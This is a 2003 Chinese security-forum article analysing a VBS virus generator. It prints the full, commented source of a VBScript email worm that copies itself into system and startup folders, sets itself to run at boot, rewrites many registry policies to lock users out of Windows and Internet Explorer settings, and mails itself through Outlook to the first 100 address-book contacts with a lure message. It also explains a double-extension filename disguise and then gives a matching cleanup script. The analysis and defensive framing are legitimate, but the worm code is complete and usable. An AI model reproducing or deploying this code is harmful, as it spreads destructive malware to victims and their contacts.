VBS病毒制造机v1.0 分析报告
/ns/cn/jc/data/20030409033152.htm
作者:CyberSpy
QQ:18988418
Email:duguqiuai1357@163.com
日期:2003.04.08
###欢迎访问www.20cn.net 20cn网络安全小组###
警告:此文只是做一些技术性的分析,希望大家不要乱用,造成的任何后果本人概不负责。切记。
病毒制造机,这是网上流行的一款典型的病毒制造机(病毒制造机:顾名思义,就是制造病毒的机器(^_^废话)),用于傻瓜型手工制造vbs病毒(vbs病毒:就是Visual Basic Script即是VB脚本,一种通过Microsoft的Windows Script Host提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。利用WSH,用户能够操纵WSH对象、ActiveX对象、注册表和文件系统。是不是功能强大,怕怕了吧?!)。
这个软件可能是用VB编写(没有询问作者详情),调用了kernel32.dll、user32.dll和advapi32.dll三个系统动态链接库.在这里,kernel32.dll主要用于系统控制,包括进程创建,变量设置,虚拟内存管理,系统资源管理等等,是操作系统必需的库之一。user32.dll主要用于与用户交互的通信,包括messege的传递与echo等。advapi32.dll主要用于程序与系统的API接口,这里即注册表的一些操作,包括RegOpenKey(取得SubKey的Handle),RegCloseKey(关闭打开或者建立的SubKey),RegQueryvalueEx(读取指定Key的值)。
下面是运行这个制造机(其中提供的功能选择全选,也就是病毒荷载最“狠”化,说白了,就是所有破坏功能都选了,最毒)之后,得到的一个*.vbs脚本病毒(用各大杀毒软件均提示存在vbs.xxxxx病毒)的源代码,加上我的一些注释(改一下名字,比如xxxx.txt .vbs,这里第一和第二后缀名之间N个空格,是不是很迷惑人,以后大家注意防范这样的手段哦(也算一种社会工程吧^_^),就可以发送电子邮件或者其他的方式传播破坏了,您千万不要那样做哦,哈哈!不要做坏蛋!要做好人!)。
On Error Resume Next
Set fs=CreateObject("Scripting.FileSystemObject") '创建一个能与操作系统沟通的对象,再利用该对象的各种方法对注册表进行操作
Set dir1=fs.GetSpecialFolder(0) '获取Windows/WinNT文件夹位置
Set dir2=fs.GetSpecialFolder(1) '获取System32/System文件夹位置
Set so=CreateObject("Scripting.FileSystemObject")
dim r '定义一个变量
Set r=CreateObject("Wscript.Shell")
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Win32system.vbs") '复制病毒副本到Windows/WinNT文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") '复制病毒副本到System32/System文件夹位置
so.GetFile(WScript.ScriptFullName).Copy(dir1&"\Start Menu\Programs\启动\Win32system.vbs") '复制病毒副本到Start Menu启动菜单
'下面是对注册表的恶意修改和简单的依靠OE传播
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" '修改注册表,禁止“运行”菜单
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" '修改注册表,禁止“关闭”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" '修改注册表,隐藏所有逻辑盘符
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" '修改注册表,禁止注册表编辑
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","" '修改注册表,禁止开机注册表扫描
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",1,"REG_DWORD" '修改注册表,禁止“注销”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",1,"REG_DWORD" '修改注册表,禁止MS-DOS实模式
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" '修改注册表,使这个脚本本身开机自动运行
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",1,"REG_DWORD" '修改注册表,禁止显示桌面图标
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",1,"REG_DWORD" '修改注册表,禁止纯DOS模式
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" '修改注册表,禁止“任务栏和开始”菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" '修改注册表,禁止右键菜单
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" '修改注册表,禁止控制面板
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" '修改注册表,禁止导入使用.reg文件,改为用txt文件的关联
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption","警告" '设置开机提示框标题
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","您中vbs脚本病毒了,哭吧~" '设置开机提示框文本内容
Set ol=CreateObject("Outlook.Application") '创建Outlook文件对象用于传播
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) '用于向地址簿的前100名发送此 VBS病毒,可以算是简单弱智的蠕虫了吧~~
Mail.Subject="今晚你来吗?" '邮件主题
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网" '邮件内容
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
'下面是对Internet Explore 选项的恶意修改
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" '修改注册表,禁止鼠标右键
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" '修改注册表,禁止Internet选项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",1,"REG_DWORD" '修改注册表,禁止“另存为”
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" '修改注册表,禁止“文件/打开”菜单
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD" '修改注册表,禁止更改高级页设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",1,"REG_DWORD" '修改注册表,禁止更改临时文件设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",1,"REG_DWORD" '修改注册表,禁止更改自动配置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" '修改注册表,禁止更改主页,即“主页”变灰
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",1,"REG_DWORD" '修改注册表,禁止更改历史记录设置
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",1,"REG_DWORD" '修改注册表,禁止更改Internet连接向导
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" '修改注册表,禁止更改安全项
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",1,"REG_DWORD" '修改注册表,禁止“重置web设置”
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" '修改注册表,禁止查看源文件
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",1,"REG_DWORD" '修改注册表,禁止添加脱机计划
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",1,"REG_DWORD" '修改注册表,禁止“文件”菜单
下面就是作者提供的“解药”--恢复文件reset.vbs的源代码:
(由于这里与上面的病毒破坏恶意修改恰好相反,故不做注释了)
Set fs=CreateObject("Scripting.FileSystemObject")
Set dir1=fs.GetSpecialFolder(0)
Set dir2=fs.GetSpecialFolder(1)
Set so=CreateObject("Scripting.FileSystemObject")
dim r
Set r=CreateObject("Wscript.Shell")
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir2&"\Win32system.vbs"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\deltree.exe","start.exe /m deltree /y "&dir1&"\Start Menu\Programs\启动\Win32system.vbs"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ScanRegistry","scanregw.exe /autorun"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoLogOff",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\NoRealMode",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system",""
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDesktop",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp\Disabled",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",0,"REG_DWORD"
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption",""
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText",""
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserSaveAs",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Cache Internet",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\AutoConfig",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\History",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Connwiz Admin Lock",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\ResetWebSettings",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Infodelivery\Restrictions\NoAddingSubScriptions",0,"REG_DWORD"
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileMenu",0,"REG_DWORD"
通过以上的分析,大家是不是觉得VBS病毒实在太简单了,的确这样:VBS蠕虫就是这么一回事。但是这个病毒制造机出的病毒算是很菜鸟级了,因为其恐怖的破坏功能,实在让人为它捏了一把冷汗,纵使再高的高手,注册表遭遇这么严重的创伤,不重做系统才怪(否则只能说明他/她的耐心实在能让人肃然起敬¥#¥)。所以这个病毒只是太坏了,太狠了。技术性的东西实在没有多少,没有什么新意。从传染性和隐藏性来看也是很一般般。
最后再次严正申明请不要去做非法的事,小心“白帽子”请你喝茶。
纯粹的技术研究值得提倡。
PS:以上分析不当之处,敬请指正,谢谢。
===============================================
本文版权属20CN网络安全小组及其作者所有,如有转载,请保持文章完整性并注明出处
文章类型:原创 提交:CyberSpy 核查:NetDemon